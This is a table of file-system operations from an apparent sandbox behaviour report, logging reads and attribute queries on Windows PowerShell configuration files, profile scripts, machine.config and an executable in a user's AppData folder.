| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\kFT6uTQW\Desktop | type = file_attributes |
|
9 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | type = file_attributes |
|
3 | |
| Open | STD_INPUT_HANDLE |
|
1 | ||
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 |
